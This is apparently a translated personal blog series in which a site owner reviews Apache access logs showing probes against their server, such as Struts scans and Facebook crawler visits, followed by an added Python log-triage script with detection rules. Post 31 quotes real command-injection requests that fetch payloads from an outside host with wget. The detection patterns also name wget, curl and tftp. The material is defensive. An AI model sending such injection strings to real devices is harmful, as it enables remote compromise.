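XAMP-style bundles of this kind from China seem to have quite a few vulnerabilities; I have so many logs of attacks against me that I don't even want to go into it
The other party, whose site is built with ThinkPHP
Tuesday, January 29, 2019
Sunday, January 13, 2019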
Learning About System Vulnerabilities from Web Logs 33
An attack from China:
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 404 232 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /index.action HTTP/1.1" 404 210 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
123.149.22.63 - - [13/Jan/2019:12:47:31 +0800] "GET /index.do HTTP/1.1" 404 206 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
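I Googled it: this is an attack on an Apache Struts 2.5.X vulnerability, which achieves remote code execution through a REST plugin. I first thought it was an Apache vulnerability, but when I checked the official Apache site, the version only goes up to 2.4.37
While I was at it, I looked it up: Apache Struts 2 is an open-source web application framework for developing Java EE web applications. It uses and extends the Java Servlet API and encourages developers to adopt an MVC architecture
Wednesday, January 9, 2019
Learning About System Vulnerabilities from Web Logs 32
A formidable fellow (or group?) has shown up. I don't know what the large volume of attacks is meant to achieve; perhaps they want to use my website as a stepping stone to break into certain websites in China. The source IPs keep rotating, mostly among 43.239.122.130, 43.239.122.1, 43.239.122.3 and the 110.249.208.* range. I looked these IPs up and they are all from China as well (their own people attacking their own people?)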
Sunday, January 6, 2019
Learning About System Vulnerabilities from Web Logs 31 - webuzo
176.88.228.22 - - [05/Jan/2019:22:33:06 +0800] "GET / HTTP/1.1" 200 1855 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
176.88.228.22 - - [05/Jan/2019:22:33:07 +0800] "GET /maker/snwrite.cgi?mac=1234;wget%20http://93.188.163.62/snwrite HTTP/1.1" 404 215 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
176.88.228.22 - - [05/Jan/2019:22:33:08 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://93.188.163.62/dsl2750b%27$ HTTP/1.1" 302 260 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
A vulnerability that lets 176.88.228.22 in Turkey control some kind of cloud network service server at 93.188.163.62 in the United States?
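Added example (not from the original blog): a small Python triage script for the two kinds of probe shown in these posts, the Struts path scans in post 33 and the `;wget` command-injection requests in post 31. The rule names, the patterns and the sample lines are constructed for illustration, and the Struts rule assumes the site runs no Struts application.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Apache combined log format, matched up to the status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) '
)

# Rule names and patterns are this example's own. The Struts rule assumes
# the site runs no Struts application, so any *.action / *.do hit is a probe.
RULES = [
    ("struts-probe", "path", re.compile(r"^/struts2-[\w-]+/|\.(?:action|do)$")),
    ("cmd-injection-download", "query", re.compile(r"[;|&`]\s*(?:wget|curl|tftp)\b")),
]

def classify(line):
    """Return a dict describing one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Decode %XX once so ';wget%20' and ';wget ' look the same to the rules.
    fields = {"path": unquote(parts.path), "query": unquote(parts.query)}
    hits = [name for name, field, rx in RULES if rx.search(fields[field])]
    status = int(m["status"])
    # A probe answered with something other than 4xx/5xx deserves a closer look.
    return {"ip": m["ip"], "status": status, "hits": hits,
            "review": bool(hits) and status < 400}

def summarize(lines):
    """Map each client IP to the set of rules it triggered."""
    seen = defaultdict(set)
    for rec in filter(None, map(classify, lines)):
        seen[rec["ip"]].update(rec["hits"])
    return {ip: rules for ip, rules in seen.items() if rules}

# Constructed sample lines modelled on the entries above (documentation IPs).
SAMPLE = [
    '192.0.2.10 - - [13/Jan/2019:12:47:31 +0800] "GET /struts2-rest-showcase/orders.xhtml HTTP/1.1" 404 232 "-" "-"',
    '192.0.2.10 - - [13/Jan/2019:12:47:31 +0800] "GET /index.action HTTP/1.1" 404 210 "-" "-"',
    '198.51.100.7 - - [05/Jan/2019:22:33:08 +0800] "GET /login.cgi?cli=aa%20aa%27;wget%20http://203.0.113.5/x%27$ HTTP/1.1" 302 260 "-" "-"',
    '198.51.100.7 - - [05/Jan/2019:22:33:06 +0800] "GET / HTTP/1.1" 200 1855 "-" "-"',
]

if __name__ == "__main__":
    for ip, rules in summarize(SAMPLE).items():
        print(ip, sorted(rules))
```

The `review` flag separates probes that were answered with an error from ones like the 302 on `/login.cgi`, where it is worth checking what the server actually returned.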
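Saturday, January 5, 2019
Learning About System Vulnerabilities from Web Logs 30
Not sure why Facebook is interested in my website? I Googled it, and it seems Facebook crudely adds fbclid to URLs, thereby interfering with Google Analytics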
69.171.251.42 - - [05/Jan/2019:17:23:54 +0800] "GET /robots.txt HTTP/1.1" 206 36 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.149.18 - - [05/Jan/2019:17:31:51 +0800] "GET /?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q HTTP/1.1" 200 1855 "https://www.facebook.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:52 +0800] "GET /index-2.php HTTP/1.1" 200 2093 "http://w-studio.idv.tw/?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:55 +0800] "GET /favicon.png HTTP/1.1" 200 3652 "http://w-studio.idv.tw/index-2.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
66.220.149.18 - - [05/Jan/2019:17:31:56 +0800] "GET /favicon.ico HTTP/1.1" 200 5174 "http://w-studio.idv.tw/?fbclid=IwAR0YUkMJhw8iW1JaQQD7553Kks0ODc9Fa24zHSkV0qaxcBPz3f3-elPCM7Q" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"